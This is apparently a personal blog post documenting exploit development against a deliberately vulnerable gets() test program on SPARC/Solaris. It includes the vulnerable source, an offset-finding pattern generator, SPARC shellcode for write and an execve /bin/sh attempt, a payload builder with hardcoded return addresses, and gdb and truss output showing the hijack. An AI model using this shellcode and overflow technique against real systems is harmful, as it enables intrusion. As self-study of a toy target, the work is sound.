SO, back to exploiting the userland gets() function.
Vulnerable Test Prog
#include <stdio.h>
unsigned long get_sp( void ) {
__asm__("or %sp,%sp,%r1");
// %r1 may have to be %i0 in some circumstances?? weirdness..
}
void copy( ){
char buf[256];
gets(buf);
}
int main( ) {
unsigned long ret = get_sp();
fprintf (stderr, "sp = 0x%x", ret);
copy( );
return 0;
}
$ gcc -g v.c -o v
This invoke scripts helps me keep the stack offset the same whether I run the program in GDB or not..
Note: it doesn’t work that well on my Sun Blade 150 but it works well at the school server…
invoke script
#!/bin/bash
while getopts "dte:h?" opt ; do
case "$opt" in
h|\?)
printf "usage: %s -e KEY=VALUE prog [args...]\n" $(basename $0)
exit 0
;;
t)
tty=1
gdb=1
;;
d)
gdb=1
;;
e)
env=$OPTARG
;;
esac
done
shift $(expr $OPTIND - 1)
prog=$(readlink -f $1)
shift
if [ -n "$gdb" ] ; then
if [ -n "$tty" ]; then
touch /tmp/gdb-debug-pty
exec env - $env TERM=screen PWD=$PWD /usr/local/gnu/bin/gdb -tty /tmp/gdb-debug-pty --args $prog "$@"
else
exec env - $env TERM=screen PWD=$PWD /usr/local/gnu/bin/gdb --args $prog "$@"
fi
else
exec env - $env TERM=screen PWD=$PWD $prog "$@"
fi
I use the invoke script with absolute paths. Here’s an example:
/home/bazz/tools/tmp/latest/invoke2 v < super_payload_lol # or i want to use gdb: /home/bazz/tools/tmp/latest/invoke2 -d v # then from in gdb: # r < super_payload
Interesting note on overflowing a buffer accepted through standard input. Is that the 0x0a byte has the same effect as a null byte. That was not documented anywhere >_< 0x0a is \n iirc, I wonder if \r byte has the same effect (0x0d).. I could try it out but I’m not…
Below is my buffer overflow “marker” program source code. This is documented at https://blogs.umb.edu/michaelbazzinott001/2014/09/25/alternating-payload-automated-offset-calculation-and-identification/
with the shell code assist program, it creates a block of specified length, outputs to stdout.
you are then required to concat any arbitrary data plus the null byte (or, apparently \n)
#include <stdio.h>
#include <stdlib.h>
// SPARC uses sys/inttypes.h
#ifdef __sun
#include <sys/inttypes.h>
#else
#include <stdint.h>
#endif
// this form provides buffer experimentation foundation
// buffer will be created up to numbytes desired, but < MAX, specified
// on the command line argument
// form: 0x[01-ff][41-5a][41-5a][41-5a]
// 0x41-0x5a range is chars 'A' to 'Z'
// An extended range < 'A' to > 'Z' could modify this program to extend
//the MAX length of the buffer
#define CHAR_RANGE (('Z'-'A')+1) // 'Z' - 'A' is 25, but I know
// there are 26 letters in the alphabet. I call this inclusive subtraction,
// when I add 1 to get the real desired value. There is also inclusive
// addition I think. I'm using terms I created.
// little proof program to figure this out
/*
#include
// Conclusion: Inclusive Subtraction requires add 1
int main()
{
printf("Derp Face, I'm ready :) \n");
printf("'Z' - 'A' = %d", ('Z'-'A')+1);
return 0;
}
*/
#define MAX (CHAR_RANGE * 255 * 4)
// Arbitrary MAX that is derived from the following formula:
// 26a * 255b * 4c
// a [letters of the alphabet]
// b [ byte field width excluding 0 (null byte)]
// c [ 4 bytes per entry ie. 0x01414141 ]
#define RANGE (26*4)
// does the following operation to get the offset:
// [(msb - 1) * 26] + (lsb - 0x41)
unsigned long getSmashOffset(const unsigned long *smashval)
{
uint8_t msb,lsb;
msb = ( *smashval >> 24 ) & 0xff;
lsb = *smashval & 0xff;
msb--;
msb *= 26;
lsb -= 0x41;
return msb+lsb;
}
int main(int argc, char **argv)
{
char a=0x41;
char c=1;
int i, rc=0;
if (argc != 2)
{
printf ("You're doing it wrong! \n");
printf ("Usage: %s [numbytes <= %d]|[smashed-stack-val]\n", argv[0], MAX); exit (1); } unsigned long arg, numbytes,smashval; arg = numbytes = strtoul( argv[1], (void *)0, 0 ); if (arg > MAX)
{
if (arg < 0x01414141) { printf ("You can't have an overflow amount > %d\n", MAX);
exit(2);
}
else
{
printf ("%lu\n", getSmashOffset(&arg));
return 0;
}
}
int tag;
for (a=0x40,i=0,c=1,tag=1; i < (numbytes); i++)
{
// if (!rc)
if (i%4 == 0)
{
tag = !tag;
printf("%c", c);
//if (tag == 1)
//{
a++;
if (a == 'Z'+1)
a = 0x41;
//}
}
else
printf("%c",a);
// else printf("%c%c%c%c", a,a,a,a);
rc ++; //+= 4;
if (rc == RANGE)
{
rc=0; c++;
if (!c)
c++;
}
}
//printf("%c",'\0');
return 0;
}
Check it out, here’s a stupid program that uses the write syscall to write some text “Hello” to stdout.
write_raw.S
bazz@blade72[pts/3][~/nobackup/fun] cat write_raw.S .globl main main: ! %o1 must point to the string! let's store the string on the stack set 0x48656c6c, %o0 !"Hell" st %o0, [%sp+84] set 0x6f0a0000, %o0 ! "o\n" st %o0, [%sp+88] add %sp, 84, %o1 mov 1, %o0 mov 7, %o2 mov 4, %g1 ta 8 ! addition to prevent illegal instruction failure mov 1, %g1 ! move 1(exit() syscall) into %g1 mov 0, %o0 ! move 0(return address) into %o0 ta 8 ! call the kernel bazz@blade72[pts/3][~/nobackup/fun] gcc write_raw.S -o /tmp/write_ex bazz@blade72[pts/3][~/nobackup/fun] /tmp/write_ex Hello bazz@blade72[pts/3][~/nobackup/fun
This gets transformed to shellcode like this:
bazz@blade72[pts/3][~/nobackup/fun/asmshell] declare -f buildsc
buildsc ()
{
if [ "$1" = "" ]; then
echo 'buildsc filename no extension';
return 1;
fi;
as $1.S -o $1.o;
objcopy -O binary $1.o $1.bin
}
An alternative to objcopy, also sparcv9 how to:
bazz@vm72[pts/3][~/tools/tmp] cat asmtobin.sh as -Av9 $1.S -o $1.o ld $1.o -o $1.bin --oformat=binary bazz@vm72[pts/3][~/tools/tmp]
bazz@blade72[pts/3][~/nobackup/fun] buildsc write_raw bazz@blade72[pts/3][~/nobackup/fun] od -X -A x write_raw. write_raw.S write_raw.bin write_raw.o bazz@blade72[pts/3][~/nobackup/fun] od -X -A x write_raw.bin 000000 1112195b 9012206c d023a054 111bc280 000010 d023a058 9203a054 90102001 94102007 000020 82102004 91d02008 82102001 90102000 000030 91d02008 000034
Then, to correctly put out a buffer, this knowledge comes from experimenting and debugging the target binary..
bazz@blade72[pts/1][~/tools/tmp/latest] cat build_shellcode_steps ./alternating_payload3 328 # payload size to arrive at %fp and %i7 # fp which becomes the $sp I use during our infected run. These vals # were obtained from live debugging and a better final adaptive method should be used # at production level. # orig val: ffbefe78 printf "\xff\xbe\xfd\x78" # return address: # original val: ffbefe78 printf "\xff\xbe\xfe\xf8" #printf "\xff\xbe\xfe\x38" >> payload # orig val: 0x40 # experimented displacing the payload farther "up" the stack perl -e 'print "A"x0xc0' cat $1 # payload bin file printf "\x00"
bazz@blade72[pts/1][~/tools/tmp/latest] ./build_shellcode_steps write_raw.bin > payload
bazz@blade72[pts/1][~/tools/tmp/latest] $PWD/invoke2 -d v
GNU gdb 5.3
Copyright 2002 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "sparc-sun-solaris2.7"...
(gdb) list 0
1 #include
2 unsigned long get_sp( void ) {
3 __asm__("or %sp,%sp,%r1");
4 }
5
6 void copy( ){
7 char buf[256];
8
9 gets(buf);
10 }
(gdb)
11
12 int main( ) {
13 unsigned long ret = get_sp();
14 fprintf (stderr, "sp = 0x%x\n", ret);
15 copy( );
16 return 0;
17 }
(gdb) b 16
Breakpoint 1 at 0x10790: file v.c, line 16.
(gdb) r < payload
Starting program: /nobackup/blade74_sd0g/bazz/tmp/latest/v < payload
sp = 0xffbefd90
Breakpoint 1, main () at v.c:16
16 return 0;
(gdb) # overflow just happened
(gdb) x/96x $sp
# at this point, this current stack frame's %fp and %i7 are below and are the infected ones
# that will be returned upon the next ret restore.
# at the top of this printout is a continuation from my marker program,
# you can see the pattern. The beginning of the buffer could be looked at by
# going lower in memory ie. x/96x $sp-96 or farther down as well..
# but that's not necessary for us. this post is to show how the write syscalls
# are about to be executed just fine, but later the execv
# syscall just returns and I don't get a shell for some reason.
0xffbefe00: 0x03515151 0x03525252 0x03535353 0x03545454
0xffbefe10: 0x03555555 0x03565656 0x03575757 0x03585858
0xffbefe20: 0x03595959 0x035a5a5a 0x04414141 0x04424242
0xffbefe30: 0x04434343 0x04444444 0xffbefd78 0xffbefef8
0xffbefe40: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbefe50: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbefe60: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbefe70: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbefe80: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbefe90: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbefea0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbefeb0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbefec0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbefed0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbefee0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbefef0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeff00: 0x1112195b 0x9012206c 0xd023a054 0x111bc280
0xffbeff10: 0xd023a058 0x9203a054 0x90102001 0x94102007
0xffbeff20: 0x82102004 0x91d02008 0x82102001 0x90102000
0xffbeff30: 0x91d02008 0x00002000 0x000007d0 0x00001caf
0xffbeff40: 0x000007d1 0x00001caf 0x000007d2 0x00002801
0xffbeff50: 0x000007d3 0x00002801 0x000007d9 0x00000007
0xffbeff60: 0x00000000 0x00000000 0x2f6e6f62 0x61636b75
---Type to continue, or q to quit---
0xffbeff70: 0x702f626c 0x61646537 0x345f7364 0x30672f62
(gdb) si
17 }
(gdb)
0x00010798 17 }
(gdb) x/4i $pc
0x10798 <main+64>: ret
0x1079c <main+68>: restore
0x107a0 <main+72>: retl
0x107a4 <main+76>: add %o7, %l7, %l7
(gdb) si
0x0001079c 17 }
(gdb)
0xffbeff00 in ?? ()
(gdb) x/16i $pc
0xffbeff00: sethi %hi(0x48656c00), %o0
0xffbeff04: or %o0, 0x6c, %o0 ! 0x48656c6c
0xffbeff08: st %o0, [ %sp + 0x54 ]
0xffbeff0c: sethi %hi(0x6f0a0000), %o0
0xffbeff10: st %o0, [ %sp + 0x58 ]
0xffbeff14: add %sp, 0x54, %o1
0xffbeff18: mov 1, %o0
0xffbeff1c: mov 7, %o2
0xffbeff20: mov 4, %g1
0xffbeff24: ta 8
0xffbeff28: mov 1, %g1
0xffbeff2c: clr %o0
0xffbeff30: ta 8
0xffbeff34: unimp 0x2000
0xffbeff38: unimp 0x7d0
0xffbeff3c: unimp 0x1caf
(gdb) si
0xffbeff04 in ?? ()
(gdb)
0xffbeff08 in ?? ()
(gdb)
0xffbeff0c in ?? ()
(gdb)
0xffbeff10 in ?? ()
(gdb)
0xffbeff14 in ?? ()
(gdb)
0xffbeff18 in ?? ()
(gdb)
0xffbeff1c in ?? ()
(gdb)
0xffbeff20 in ?? ()
(gdb)
0xffbeff24 in ?? ()
(gdb)
Hello
0xffbeff28 in ?? ()
(gdb)
0xffbeff2c in ?? ()
(gdb)
0xffbeff30 in ?? ()
(gdb)
Program exited normally.
(gdb) del
Delete all breakpoints? (y or n) y
(gdb) r < payload
Starting program: /nobackup/blade74_sd0g/bazz/tmp/latest/v < payload
sp = 0xffbefd90
Hello
Program exited normally.
(gdb) q
bazz@blade72[pts/1][~/tools/tmp/latest] $PWD/invoke2 v < payload
sp = 0xffbefd90
Hello
bazz@blade72[pts/1][~/tools/tmp/latest]
OK I clearly demonstrated how the write example buffer overflow hijacked just fine.
But now.. a shell spawn fails, and I don’t know why:
bazz@blade72[pts/3][~/nobackup/fun/asmshell] cat asmshell3.S .globl main main: set 0x2f62696e, %o0 st %o0, [%sp+84] set 0x2f736800, %o0 st %o0, [%sp+88] add %sp, 84, %o0 clr [%sp+92] st %o0, [%sp+76] clr [%sp+80] add %sp, 76, %o1 xor %o5,%o5,%o2 mov 0x3b, %g1 ta 8 !ta 8 ! addition to prevent illegal instruction failure xor %o5,%o5,%o0 !add %o1,%o1,%o0 ! interprets as end of string!! even without null byte ! and o1, 2, %o0 ! exit(0) mov 1, %g1 ta 8 bazz@blade72[pts/3][~/nobackup/fun/asmshell] buildsc asmshell3 bazz@blade72[pts/3][~/nobackup/fun/asmshell] od -X -A x asmshell3.bin 000000 110bd89a 9012216e d023a054 110bdcda 000010 d023a058 9003a054 c023a05c d023a04c 000020 c023a050 9203a04c 941b400d 8210203b 000030 91d02008 901b400d 82102001 91d02008 000040 bazz@blade72[pts/3][~/nobackup/fun/asmshell] cp asmshell3.bin ~/tools/tmp/latest bazz@blade72[pts/1][~/tools/tmp/latest] ./build_shellcode_steps asmshell3.bin > payload bazz@blade72[pts/1][~/tools/tmp/latest] $PWD/invoke2 -d v GNU gdb 5.3 Copyright 2002 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "sparc-sun-solaris2.7"... (gdb) b 16 Breakpoint 1 at 0x10790: file v.c, line 16. (gdb) r < payload Starting program: /nobackup/blade74_sd0g/bazz/tmp/latest/v < payload sp = 0xffbefd90 Breakpoint 1, main () at v.c:16 16 return 0; (gdb) x/96x $sp 0xffbefe00: 0x03515151 0x03525252 0x03535353 0x03545454 0xffbefe10: 0x03555555 0x03565656 0x03575757 0x03585858 0xffbefe20: 0x03595959 0x035a5a5a 0x04414141 0x04424242 0xffbefe30: 0x04434343 0x04444444 0xffbefd78 0xffbefef8 0xffbefe40: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefe50: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefe60: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefe70: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefe80: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefe90: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefea0: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefeb0: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefec0: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefed0: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefee0: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefef0: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbeff00: 0x110bd89a 0x9012216e 0xd023a054 0x110bdcda 0xffbeff10: 0xd023a058 0x9003a054 0xc023a05c 0xd023a04c 0xffbeff20: 0xc023a050 0x9203a04c 0x941b400d 0x8210203b 0xffbeff30: 0x91d02008 0x901b400d 0x82102001 0x91d02008 0xffbeff40: 0x000007d1 0x00001caf 0x000007d2 0x00002801 0xffbeff50: 0x000007d3 0x00002801 0x000007d9 0x00000007 0xffbeff60: 0x00000000 0x00000000 0x2f6e6f62 0x61636b75 ---Type <return> to continue, or q <return> to quit--- 0xffbeff70: 0x702f626c 0x61646537 0x345f7364 0x30672f62 (gdb) c Continuing. Program received signal SIGTRAP, Trace/breakpoint trap. 0xff3b3be0 in ?? () (gdb) c Continuing. Program exited normally. # NO SHELL!!! (gdb) q bazz@blade72[pts/1][~/tools/tmp/latest] $PWD/invoke2 v < payload sp = 0xffbefd90 bazz@blade72[pts/1][~/tools/tmp/latest] #NO SHELL!!! bazz@blade72[pts/1][~/tools/tmp/latest] $PWD/invoke2 -d v GNU gdb 5.3 Copyright 2002 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "sparc-sun-solaris2.7"... (gdb) r < payload Starting program: /nobackup/blade74_sd0g/bazz/tmp/latest/v < payload sp = 0xffbefd90 Program received signal SIGTRAP, Trace/breakpoint trap. 0xff3b3be0 in ?? () (gdb) x/16i $pc 0xff3b3be0: b,a 0xff3b3bec 0xff3b3be4: b,a 0xff3b3bf0 0xff3b3be8: b,a 0xff3b3bf4 0xff3b3bec: mov %g0, %o0 0xff3b3bf0: save %sp, -160, %sp 0xff3b3bf4: call 0xff3b3bfc 0xff3b3bf8: sethi %hi(0x2c800), %l7 0xff3b3bfc: or %l7, 0x3b4, %l7 ! 0x2cbb4 0xff3b3c00: addcc %i0, %g0, %o0 0xff3b3c04: bne 0xff3b3c60 0xff3b3c08: add %l7, %o7, %l7 0xff3b3c0c: add %sp, 0x60, %o0 0xff3b3c10: mov 3, %l0 0xff3b3c14: st %l0, [ %o0 ] 0xff3b3c18: add %fp, 0x44, %l0 0xff3b3c1c: st %l0, [ %o0 + 4 ] (gdb) q The program is running. Exit anyway? (y or n) y bazz@blade72[pts/1][~/tools/tmp/latest]
I seem to be in some trap handler.. Maybe the mysteries as to why it’s returning and not spawning a shell lie in there….
TO BE CONTINUED
… UPDATE!!!!
-bash-4.3$ ./build_shellcode_steps asmshell5_interactive.bin
-bash-4.3$ truss $PWD/invoke2 v < payload
execve("/home/bazz/latest/invoke2", 0xFFBEFD3C, 0xFFBEFD4C) argc = 3
resolvepath("/usr/lib/ld.so.1", "/usr/lib/ld.so.1", 1023) = 16
open("/var/ld/ld.config", O_RDONLY) Err#2 ENOENT
stat("/usr/lib/libcurses.so.1", 0xFFBEF620) = 0
resolvepath("/usr/lib/libcurses.so.1", "/usr/lib/libcurses.so.1", 1023) = 23
open("/usr/lib/libcurses.so.1", O_RDONLY) = 3
mmap(0x00000000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE, 3, 0) = 0xFF390000
mmap(0x08F13AF8, 278528, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF340000
mmap(0xFF340000, 165416, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF340000
mmap(0xFF37A000, 28774, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 172032) = 0xFF37A000
mmap(0xFF382000, 6688, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_ANON, -1, 0) = 0xFF382000
munmap(0xFF36A000, 65536) = 0
memcntl(0xFF340000, 49420, MC_ADVISE, MADV_WILLNEED, 0, 0) = 0
close(3) = 0
stat("/usr/lib/libsocket.so.1", 0xFFBEF620) = 0
resolvepath("/usr/lib/libsocket.so.1", "/usr/lib/libsocket.so.1", 1023) = 23
open("/usr/lib/libsocket.so.1", O_RDONLY) = 3
mmap(0xFF390000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF390000
mmap(0x08F13EE0, 114688, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF320000
mmap(0xFF320000, 40558, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF320000
mmap(0xFF33A000, 4365, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 40960) = 0xFF33A000
munmap(0xFF32A000, 65536) = 0
memcntl(0xFF320000, 14496, MC_ADVISE, MADV_WILLNEED, 0, 0) = 0
close(3) = 0
stat("/usr/lib/libnsl.so.1", 0xFFBEF620) = 0
resolvepath("/usr/lib/libnsl.so.1", "/usr/lib/libnsl.so.1", 1023) = 20
open("/usr/lib/libnsl.so.1", O_RDONLY) = 3
mmap(0xFF390000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF390000
mmap(0x08F142C8, 655360, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF200000
mmap(0xFF200000, 582266, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF200000
mmap(0xFF290000, 33320, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 589824) = 0xFF290000
mmap(0xFF29A000, 23376, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_ANON, -1, 0) = 0xFF29A000
memcntl(0xFF200000, 84064, MC_ADVISE, MADV_WILLNEED, 0, 0) = 0
close(3) = 0
stat("/usr/lib/libdl.so.1", 0xFFBEF620) = 0
resolvepath("/usr/lib/libdl.so.1", "/usr/lib/libdl.so.1", 1023) = 19
open("/usr/lib/libdl.so.1", O_RDONLY) = 3
mmap(0xFF390000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF390000
mmap(0x08F19CA0, 8192, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF310000
mmap(0xFF310000, 2302, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF310000
mmap(0x00000000, 8192, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANON, -1, 0) = 0xFF300000
close(3) = 0
stat("/usr/lib/libc.so.1", 0xFFBEF620) = 0
resolvepath("/usr/lib/libc.so.1", "/usr/lib/libc.so.1", 1023) = 18
open("/usr/lib/libc.so.1", O_RDONLY) = 3
mmap(0xFF390000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF390000
mmap(0x09899EB0, 802816, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF100000
mmap(0xFF100000, 704216, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF100000
mmap(0xFF1BC000, 24772, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 704512) = 0xFF1BC000
munmap(0xFF1AC000, 65536) = 0
memcntl(0xFF100000, 113528, MC_ADVISE, MADV_WILLNEED, 0, 0) = 0
close(3) = 0
stat("/usr/lib/libmp.so.2", 0xFFBEF620) = 0
resolvepath("/usr/lib/libmp.so.2", "/usr/lib/libmp.so.2", 1023) = 19
open("/usr/lib/libmp.so.2", O_RDONLY) = 3
mmap(0xFF390000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF390000
mmap(0x09899AC8, 90112, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF2E0000
mmap(0xFF2E0000, 11316, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF2E0000
mmap(0xFF2F4000, 865, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 16384) = 0xFF2F4000
munmap(0xFF2E4000, 65536) = 0
memcntl(0xFF2E0000, 3124, MC_ADVISE, MADV_WILLNEED, 0, 0) = 0
close(3) = 0
stat("/usr/platform/SUNW,Sun-Blade-100/lib/libc_psr.so.1", 0xFFBEF338) = 0
resolvepath("/usr/platform/SUNW,Sun-Blade-100/lib/libc_psr.so.1", "/usr/platform/sun4u/lib/libc_psr.so.1", 1023) = 37
open("/usr/platform/SUNW,Sun-Blade-100/lib/libc_psr.so.1", O_RDONLY) = 3
mmap(0xFF390000, 8192, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF390000
mmap(0x00000000, 16384, PROT_NONE, MAP_PRIVATE|MAP_NORESERVE|MAP_ANON, -1, 0) = 0xFF2D0000
mmap(0xFF2D0000, 13800, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xFF2D0000
close(3) = 0
munmap(0xFF390000, 8192) = 0
getcontext(0xFFBEFA88)
open64("/dev/tty", O_RDWR|O_NONBLOCK) = 3
close(3) = 0
brk(0x0010A060) = 0
sysconfig(_CONFIG_PAGESIZE) = 8192
brk(0x0010A060) = 0
brk(0x0010C000) = 0
brk(0x0010E000) = 0
getuid() = 100 [100]
getgid() = 10 [10]
getuid() = 100 [100]
getgid() = 10 [10]
getcontext(0xFFBEFA88)
time() = 1413348374
brk(0x00110000) = 0
brk(0x00112000) = 0
sigaction(SIGCLD, 0xFFBEF9A0, 0xFFBEFA20) = 0
sigaction(SIGCLD, 0xFFBEF9A0, 0xFFBEFA20) = 0
sigaction(SIGINT, 0xFFBEF9A0, 0xFFBEFA20) = 0
sigaction(SIGINT, 0xFFBEF9A0, 0xFFBEFA20) = 0
sigaction(SIGQUIT, 0xFFBEF9A0, 0xFFBEFA20) = 0
sigaction(SIGQUIT, 0xFFBEF9A0, 0xFFBEFA20) = 0
sigprocmask(SIG_BLOCK, 0x00000000, 0x0010A020) = 0
sigfillset(0xFF1C28D0) = 0
sigaction(SIGQUIT, 0xFFBEF9A0, 0xFFBEFA20) = 0
uname(0xFFBEF5D8) = 1
stat64("/home/bazz/latest", 0xFFBEF928) = 0
stat64(".", 0xFFBEF890) = 0
getpid() = 2098 [2097]
getpid() = 2098 [2097]
getpid() = 2098 [2097]
getpgrp() = 2097
sigaction(SIGCLD, 0xFFBEF9A0, 0xFFBEFA20) = 0
sysconfig(_CONFIG_CHILD_MAX) = 7893
getcontext(0xFFBEFA88)
open64("/home/bazz/latest/invoke2", O_RDONLY) = 3
ioctl(3, TCGETA, 0xFFBEFAE4) Err#25 ENOTTY
llseek(3, 0, SEEK_CUR) = 0
read(3, " # ! / b i n / b a s h\n".., 80) = 80
llseek(3, 0, SEEK_SET) = 0
getrlimit(RLIMIT_NOFILE, 0xFFBEFA78) = 0
fcntl(255, F_GETFD, 0xFFBEFAE4) Err#9 EBADF
fcntl(3, F_DUP2FD, 0x000000FF) = 255
close(3) = 0
fcntl(255, F_SETFD, 0x00000001) = 0
fcntl(255, F_GETFL, 0x00000000) = 8192
fstat64(255, 0xFFBEFAD8) = 0
fstat64(255, 0xFFBEFB30) = 0
llseek(255, 0, SEEK_CUR) = 0
getcontext(0xFFBEFA08)
read(255, " # ! / b i n / b a s h\n".., 718) = 718
getcontext(0xFFBEFA08)
getcontext(0xFFBEFA08)
brk(0x00114000) = 0
getcontext(0xFFBEF390)
getcontext(0xFFBEFA08)
getcontext(0xFFBEFA08)
sigprocmask(SIG_BLOCK, 0x00000000, 0xFFBEF6B8) = 0
getcontext(0xFFBEF488)
brk(0x00116000) = 0
pipe() = 3 [4]
sigprocmask(SIG_BLOCK, 0xFFBEF680, 0xFFBEF670) = 0
sigprocmask(SIG_SETMASK, 0xFFBEF670, 0x00000000) = 0
sigprocmask(SIG_BLOCK, 0xFFBEF67C, 0xFFBEF66C) = 0
llseek(255, 0xFFFFFFFFFFFFFE63, SEEK_CUR) = 305
fork() = 2099
sigprocmask(SIG_SETMASK, 0xFFBEF66C, 0x00000000) = 0
Received signal #18, SIGCLD [caught]
siginfo: SIGCLD CLD_EXITED pid=2099 status=0x0001
waitid(P_ALL, 0, 0xFFBEF120, WEXITED|WTRAPPED|WNOHANG) = 0
waitid(P_ALL, 0, 0xFFBEF120, WEXITED|WTRAPPED|WNOHANG) Err#10 ECHILD
setcontext(0xFFBEF350)
sigaction(SIGCLD, 0xFFBEF5D0, 0xFFBEF650) = 0
close(4) = 0
read(3, " 0\n", 128) = 2
read(3, 0xFFBEF710, 128) = 0
close(3) = 0
sigprocmask(SIG_BLOCK, 0xFFBEF680, 0xFFBEF670) = 0
sigaction(SIGINT, 0xFFBEF538, 0xFFBEF5B8) = 0
sigaction(SIGINT, 0xFFBEF4C8, 0xFFBEF548) = 0
sigprocmask(SIG_SETMASK, 0xFFBEF670, 0x00000000) = 0
getcontext(0xFFBEFA08)
read(255, " p r o g = $ ( / h o m e".., 718) = 413
sigprocmask(SIG_BLOCK, 0x00000000, 0xFFBEF4D0) = 0
getcontext(0xFFBEF2A0)
pipe() = 3 [4]
sigprocmask(SIG_BLOCK, 0xFFBEF498, 0xFFBEF488) = 0
sigprocmask(SIG_SETMASK, 0xFFBEF488, 0x00000000) = 0
sigprocmask(SIG_BLOCK, 0xFFBEF494, 0xFFBEF484) = 0
llseek(255, 0xFFFFFFFFFFFFFE89, SEEK_CUR) = 343
fork() = 2100
sigprocmask(SIG_SETMASK, 0xFFBEF484, 0x00000000) = 0
Received signal #18, SIGCLD [caught]
siginfo: SIGCLD CLD_EXITED pid=2100 status=0x0000
waitid(P_ALL, 0, 0xFFBEEF38, WEXITED|WTRAPPED|WNOHANG) = 0
waitid(P_ALL, 0, 0xFFBEEF38, WEXITED|WTRAPPED|WNOHANG) Err#10 ECHILD
setcontext(0xFFBEF168)
sigaction(SIGCLD, 0xFFBEF3E8, 0xFFBEF468) = 0
close(4) = 0
read(3, " / h o m e / b a z z / l".., 128) = 20
read(3, 0xFFBEF528, 128) = 0
close(3) = 0
sigprocmask(SIG_BLOCK, 0xFFBEF498, 0xFFBEF488) = 0
sigaction(SIGINT, 0xFFBEF350, 0xFFBEF3D0) = 0
sigaction(SIGINT, 0xFFBEF2E0, 0xFFBEF360) = 0
sigprocmask(SIG_SETMASK, 0xFFBEF488, 0x00000000) = 0
getcontext(0xFFBEFA08)
read(255, " s h i f t\n i f [ -".., 718) = 375
getcontext(0xFFBEFA08)
getcontext(0xFFBEF4E0)
getcontext(0xFFBEF4E0)
setcontext(0xFFBEF4E0)
sigaction(SIGINT, 0xFFBEF5E0, 0xFFBEF660) = 0
sigaction(SIGQUIT, 0xFFBEF5E0, 0xFFBEF660) = 0
sigaction(SIGCLD, 0xFFBEF5E0, 0xFFBEF660) = 0
execve("/home/bazz/bin/env", 0x001132C8, 0x0010F908) argc = 5
resolvepath("/usr/lib/ld.so.1", "/usr/lib/ld.so.1", 1023) = 16
open("/var/ld/ld.config", O_RDONLY) Err#2 ENOENT
